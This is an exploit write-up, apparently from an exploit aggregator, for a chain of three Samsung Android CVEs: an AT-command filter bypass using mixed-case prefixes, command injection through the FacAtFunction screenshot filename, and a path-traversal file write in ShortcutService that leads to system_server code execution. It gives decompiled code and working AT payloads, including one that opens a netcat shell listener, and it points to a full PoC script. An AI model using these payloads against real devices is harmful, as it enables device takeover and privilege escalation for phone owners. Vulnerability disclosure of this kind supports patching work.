## https://sploitus.com/exploit?id=C5EF0495-F285-5BD7-8ED7-78FD307F5464
# Part 1: Arbitrary AT command execution (CVE-2026-20980)
Application Processor(AP) commands are managed by at_distributor after switching the connection mode in an unlocked device using.
```
AT+SWATD=0
AT+ACTIVATE=0,0,0
AT+SWATD=1
```
at_distributor verifies AT commands through the function pacm_check_at_cmds
```
void main(int32_t arg1, void* arg2) __noreturn
{
int32_t var_21b0 = arg1;
data_42c170 = SignalHandler;
sigemptyset(0x42c178);
...
if (pacm_check_at_cmds(&data_42c1b4, &var_2160, &data_404a82, v0_11) != 1) {
SendToTerminal(&var_2160,
__strlen_chk(&var_2160, 0x80)
} else {
__android_log_print(3, "AT_Distributor", "%s()", "HandleMessageFromUart");
...
}
...
}
```
function logic is located at
```
ldd at_distributor
libpacm_client.so => /system/lib64/libpacm_client.so
```
the function calls is_multiple_cmds verifies if the AT command contains multiple cmds.
```
uint64_t pacm_check_at_cmds(int64_t arg1, char* arg2)
{
uint64_t x24 = _ReadMSR(tpidr_el0);
int64_t x8 = *(x24 + 0x28);
int32_t var_284;
...
if (!arg1)
{
__android_log_print(6, "PACMAN", "%s : AT Command is NULL\n", "pacm_check_at_cmds", v0);
x20_1 = var_284;
...
} else {
Command::set_command(&var_280);
char var_2d0;
void* var_2c0;
if (var_2d0 & 1)
operator delete(var_2c0, var_2d0 & 0xfffffffffffffffe);
int32_t x8_6;
if (!Command::is_multiple_cmds())
{
int32_t x0_13;
int128_t v0_1;
x0_13 = Command::preprocess_cmds(&var_280);
...
}
...
}
}
int64_t Command::is_multiple_cmds()
{
...
size_t x0 = strlen("
at+");
if (x0) {
...
memcmp(x0_4, "
at+", x0);
...
}
size_t x0_1 = strlen("
AT+");
if (x0_1) {
...
memcmp(x0_7, "
AT+", x0_1);
...
}
size_t x0_2 = strlen("
at+");
if (x0_2) {
...
memcmp(x0_10, "
at+", x0_2);
...
}
size_t x0_3 = strlen("
AT+");
if (x0_3) {
...
memcmp(x0_13, "
AT+", x0_3);
...
}
...
return 1;
}
```
so an AT command with this payload will fail .
```
TX: AT+\nAT+VERSNAME=3,2,1
RX: +CME Error:PACM(AP),MULTIPLE_CMD
```
but is_multiple_cmd fails to verify "aT+" or "At+" thus the protected/unregistered command gets executed
```
TX: AT+\naT+VERSNAME=1,3,0 (Note:AT+VERSNAME=1,3,0 is a protected command)
RX: +VERSNAME:1,SM8550,SM8550
```
# Part 2: Arbitrary system command execution in FacAtFunction (CVE-2026-20981)
FacAtFunction(uid 1000) a system app, processes most of the AP AT commands,
specifically an unregistered command `AT+CAMEAUTO`
this command is used to capture screen using shell function/exec.
```
...
if (checkArgu(strArr, new String[]{"0", "1", "0", "2"})) {
FtUtil.log_d(((AtCommandHandler) this).CLASS_NAME, "handleCommand", "Screen Capture & File Name : " + strArr[4]);
screenCapture(strArr[4]);
FtUtil.log_d(((AtCommandHandler) this).CLASS_NAME, "screenCapture", "result : 1");
str = responseOK(strArr[0]);
...
}
public final void screenCapture(String str) {
Process process;
FtUtil.log_i(((AtCommandHandler) this).CLASS_NAME, "ScreenCapture", "ScreenCapture Start");
...
String str3 = i < 10 ? m + "SCREENIMAGE0" + i + "_" + str + "_" + simpleDateFormat.format(new Date(currentTimeMillis)) + ".jpg" : m + "SCREENIMAGE" + i + "_" + str + "_" + simpleDateFormat.format(new Date(currentTimeMillis)) + ".jpg";
FtUtil.log_i(((AtCommandHandler) this).CLASS_NAME, "screenCapture", str + i + " / " + str3);
?? r15 = {"/system/bin/sh", "-c", str3};
Process process2 = null;
try {
try {
FtUtil.log_i(((AtCommandHandler) this).CLASS_NAME, "ScreenCapture", "capture command");
process = Runtime.getRuntime().exec(r15);
...
...
}
```
the filename is taken from user , but screenCapture func fails to sanitize the filename.
and since we can execute unregistered command from **Part 1**, it can be executed as.
```
TX: AT\naT+CAMEAUTO=0,1,0,2,/;/system/bin/toybox netcat -s 127.0.0.1 -p 1234 -L sh -l;
RX: OK
```
# Part 3: ShortcutService arbitrary file write (CVE-2026-20982)
Samsung have implemented custom restore method for Smart Switch to restore Bitmap files
```
public void restoreBitmapsFromBackupService(ParcelFileDescriptor parcelFileDescriptor, String str, String str2) {
enforceScloudBackupWritePermission();
try {
ParcelFileDescriptor.AutoCloseInputStream autoCloseInputStream = new ParcelFileDescriptor.AutoCloseInputStream(parcelFileDescriptor);
FileOutputStream openIconFileForWriteSmartSwitch = openIconFileForWriteSmartSwitch(0, str, str2);
byte[] bArr = new byte[1024];
while (true) {
int read = autoCloseInputStream.read(bArr);
if (read <= 0) {
break;
}
openIconFileForWriteSmartSwitch.write(bArr, 0, read);
}
if (openIconFileForWriteSmartSwitch != null) {
openIconFileForWriteSmartSwitch.close();
}
autoCloseInputStream.close();
} catch (Exception unused) {
}
}
public final FileOutputStream openIconFileForWriteSmartSwitch(int i, String str, String str2) {
File file = new File(getUserBitmapFilePath(i), str);
if (!file.isDirectory()) {
file.mkdirs();
if (!file.isDirectory()) {
Slog.d("ShortcutService", "Unable to create directory " + file);
throw new IOException("Unable to create directory " + file);
}
SELinux.restorecon(file);
}
File file2 = new File(file, str2);
if (file2.exists()) {
Slog.d("ShortcutService", "Unable to create file - already exists " + file2);
throw new IOException("Unable to create file - already exists " + file2);
}
return new FileOutputStream(file2);
}
public final void enforceScloudBackupWritePermission() {
injectEnforceCallingPermission("com.samsung.android.scloud.backup.lib.write", null);
}
```
restoreBitmapsFromBackupService is gated by permission "com.samsung.android.scloud.backup.lib.write",
we will use uid 1000 from **Part 2** which have necessary permission to call the function .
here it fails to sanitize str(directory) , str2(filename) from path traversal.
Since ShortcutService runs in `system_server` process, we can overwrite base.apk of a system app or modify packages.xml to gain code execution in `system_server`
# PoC
* Complete chain of all three CVE is present in PoC/at.py
* Source for classes.dex in PoC/CVE-2026-20982/Exploit.java
* [PoC Demo](PoC/Rec/poc.mp4)